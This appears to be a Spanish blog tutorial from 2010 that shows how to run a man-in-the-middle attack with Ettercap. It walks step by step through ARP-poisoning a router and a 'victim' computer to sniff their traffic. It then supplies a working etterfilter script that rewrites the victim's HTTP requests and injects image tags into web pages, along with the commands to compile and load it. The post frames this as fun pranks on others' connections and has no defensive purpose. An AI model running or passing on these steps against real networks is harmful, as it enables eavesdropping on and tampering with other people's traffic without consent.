sábado, 28 de agosto de 2010

Man in the middle con ettercap & filtro para modificar los paquetes

Primero de todo arrancamos el ettercap, en caso de no tenerlo

 # apt-get install ettercap-gtk

1 nos vamos a la pestaña de snif y le damos a unfield snifing

2 seleccionamos la interfaz a espiar (eth0,wlan0..etc)

3 nos vamos a la pestaña hosts, scan for host y abajo nos aparecera x host alive o algo por el estilo luego en la misma pestaña le damos a host list y seleccionamos la ip del router como target 1 i la ip de la maquina victima como target 2 (tambien podemos poner como target 1 la victima i como target 2 el router es indiferente...)

4 nos dirigimos a la pestaña Mitm, luego le damos a arp poisoning marcamos la casilla snif remote connections y aceptar

5 le damos a star snifing

6 le damos a wiev y luego a connections y aquí podremos ir viendo los paquetes que pasan entre el router y el pc victima si le damos doble click a alguno de ellos deberia mostrarse su contenido

Una vez hecho todo esto si nos interessa jugar un poco mas con el ettercap podemos probar a usar este filtro tan interesante de aqui
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

lo guardamos con extension imagen.filter i ejecutamos en terminal para "compilarlo"

$ etterfilter imagen.filter -o imagen.ef  

el resultado (imagen.ef) lo guardamos en : /usr/share/ettercap

Luego arrancamos de nuevo ettercap pero antes de todo nos vamos a filter>load filter>i seleccionamos imagen.ef luego realizamos el ataque man in the middle
y cuando el otro pc cargue una pag le saldrá algo parecido a esto...



interesante eh, pues el código del filtro se basa en reemplazar sentencias html por otras por lo cual le podemos dar diferentes usos, si por ejemplo envez de reemplazar img src="....  hacemos que reemplace alguna tag relacionada cone l texto podemos obtener algo asi:


enfin con esto seguro que se os ocurren mil trastadas para hacer con ettercap
y añado la parte del código a reemplazar es:

   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
Publicado por en

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)